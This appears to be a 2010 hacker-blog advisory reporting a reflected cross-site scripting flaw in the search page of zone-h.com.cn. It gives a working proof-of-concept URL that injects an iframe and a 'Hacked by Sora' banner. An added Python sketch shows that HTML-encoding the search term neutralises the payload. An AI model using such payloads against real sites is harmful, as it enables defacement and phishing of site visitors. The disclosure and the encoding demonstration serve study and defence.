[whitepaper] Zone-H (CN) XSS Vulnerability

.__
____________   ____   ____           |  |__               ____   ____
\___   /  _ \ /    \_/ __ \   ______ |  |  \    ______  _/ ___\ /    \
/    (  <_> )   |  \  ___/  /_____/ |   Y  \  /_____/  \  \___|   |  \
/_____ \____/|___|  /\___  >         |___|  /            \___  >___|  /
\/          \/     \/               \/                 \/     \/
> Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

————————
1. INFORMATION         |
————————
Site: http://www.zone-h.com.cn/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————
2. DESCRIPTION         |
————————
http://www.zone-h.com.cn/ suffers from a cross-site scripting vulnerability. This vulnerability can be exploited in many ways.
For example, it can be used to create a form to scam other people, or to execute malicious JavaScript code on the victim’s computer.

————————
3. PROOF OF CONCEPT    |
————————

HTML Code:
http://www.zone-h.com.cn/index.php?key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+%5Bat%5D+hotmail+%5Bdot%5D+com%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+
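
Added example (not part of the original advisory and not the site's code): the sketch below decodes the `key` parameter from the proof-of-concept query string and shows that it is parsed as markup when echoed raw but stays inert text when HTML-encoded on output. The `render_*` templates and the `tags_in` helper are assumptions made for illustration, since the server-side code of index.php is not shown here.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Query string copied from the proof-of-concept URL above.
POC_QUERY = (
    "key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E"
    "%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+%5Bat%5D+hotmail+%5Bdot%5D+com"
    "%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+"
)

def search_key(query):
    """Decode the query string as a web framework would and return `key`."""
    return parse_qs(query, keep_blank_values=True).get("key", [""])[0]

def render_raw(key):
    # Assumed vulnerable template: the search term is concatenated as-is.
    return "<p>Results for: " + key + "</p>"

def render_encoded(key):
    # Same template with output encoding for the HTML body context.
    return "<p>Results for: " + html.escape(key, quote=True) + "</p>"

def render_attribute(key):
    # Refilling the search box: quote=True also encodes " and ' so the
    # value cannot close the attribute it is placed in.
    return '<input name="key" value="' + html.escape(key, quote=True) + '">'

class _Tags(HTMLParser):
    """Collects the names of start tags the parser recognises."""
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append(tag)

def tags_in(markup):
    """Return the element names an HTML parser finds in `markup`."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.seen

if __name__ == "__main__":
    key = search_key(POC_QUERY)
    print("raw:      ", tags_in(render_raw(key)))
    print("encoded:  ", tags_in(render_encoded(key)))
    print("attribute:", tags_in(render_attribute(key)))
```
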

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora


2 Responses to “[whitepaper] Zone-H (CN) XSS Vulnerability”

  1. Thanks for the information

  2. You are welcome, Dr BiLLi HaCkEr.
